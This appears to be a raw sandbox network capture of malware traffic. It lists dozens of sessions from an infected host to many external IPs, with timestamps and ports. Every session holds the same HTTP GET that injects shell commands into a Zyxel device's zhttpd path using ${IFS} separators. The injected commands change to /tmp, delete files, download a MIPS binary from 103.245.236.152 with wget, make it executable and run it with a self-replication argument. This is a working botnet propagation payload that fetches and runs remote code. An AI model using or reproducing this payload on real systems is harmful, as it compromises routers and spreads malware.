                                        Jan 14, 2024 16:18:43.425443888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4037192.168.2.134651637.73.50.133443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.425489902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4038192.168.2.1351442170.172.9.115443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.425514936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4039192.168.2.1338736125.112.252.183443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.425578117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4040192.168.2.1352922144.135.60.178443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.425611019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4041192.168.2.1357822154.4.180.166443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.425653934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4042192.168.2.1341686171.219.49.124443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.425692081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4043192.168.2.1333732123.124.102.163443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.425739050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4044192.168.2.1356148191.120.62.180443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.425770044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4045192.168.2.134298458.214.8.11443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.425833941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4046192.168.2.1344068208.149.218.46443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.425862074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4047192.168.2.1354346117.129.248.193443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.426000118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4048192.168.2.134770673.180.202.73443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.426038980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4049192.168.2.1351848102.36.56.126443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.426367044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4050192.168.2.1356130208.127.183.72443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.427648067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4051192.168.2.1354794221.46.89.8443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.428174973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4052192.168.2.1333950143.245.236.35443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.429020882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4053192.168.2.1353090203.63.3.199443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.429653883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4054192.168.2.1336876208.211.200.192443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.429743052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4055192.168.2.136048289.89.203.36443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.429764986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4056192.168.2.134269249.77.6.96443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.429817915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4057192.168.2.133909842.9.142.191443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.429850101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4058192.168.2.136002248.145.229.231443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.429877043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4059192.168.2.135999295.116.61.167443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.429929018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4060192.168.2.134139448.160.28.111443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.429960966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4061192.168.2.1355692123.68.235.161443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.430003881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4062192.168.2.133715077.11.85.27443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.430053949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4063192.168.2.134077037.193.241.129443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.430078030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4064192.168.2.1354406165.163.161.60443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.430116892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4065192.168.2.1339532210.252.115.102443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.430175066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4066192.168.2.1342446174.231.128.154443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.430238008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4067192.168.2.135411686.14.114.69443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.442677975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4068192.168.2.135421659.108.153.251443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.442728996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4069192.168.2.1347672196.144.34.55443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.442794085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4070192.168.2.1356184125.96.21.13443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.442856073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4071192.168.2.1351098155.148.33.48443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.442912102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4072192.168.2.13449324.116.163.169443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.442967892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4073192.168.2.1338352105.56.92.140443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.443032980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4074192.168.2.133550878.97.85.106443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.443089008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4075192.168.2.1357774111.86.164.138443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.443125010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4076192.168.2.1337372132.62.241.112443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.443185091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4077192.168.2.1356824202.222.26.72443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.443242073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4078192.168.2.1359416113.42.179.180443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.443291903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4079192.168.2.1359648135.218.202.185443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.443339109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4080192.168.2.1348824207.167.202.173443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.443386078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4081192.168.2.1343960171.251.242.252443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.443448067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4082192.168.2.1358386106.92.194.156443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.443500996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4083192.168.2.1338734210.59.139.171443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.443562031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4084192.168.2.135171612.135.230.143443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.443640947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4085192.168.2.1342450192.95.208.238443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.443690062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4086192.168.2.134825841.61.149.184443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.443731070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4087192.168.2.1357966192.131.148.244443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.443808079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4088192.168.2.135030076.12.109.27443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.443851948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4089192.168.2.1354788125.21.68.100443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.443896055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4090192.168.2.1352804204.209.16.29443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.443964005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4091192.168.2.13463322.226.52.157443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.444027901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4092192.168.2.1358806154.238.175.13443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.444097042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4093192.168.2.1356348100.157.85.17443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.444169044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4094192.168.2.1348490175.16.15.163443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.444224119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4095192.168.2.135552244.177.41.82443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.444278955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4096192.168.2.1355250172.229.102.188443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.444324970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4097192.168.2.13515664.135.65.111443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.444396973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4098192.168.2.1360644194.127.23.22443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.444459915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4099192.168.2.135372637.12.127.242443
                                        TimestampBytes transferredDirectionData
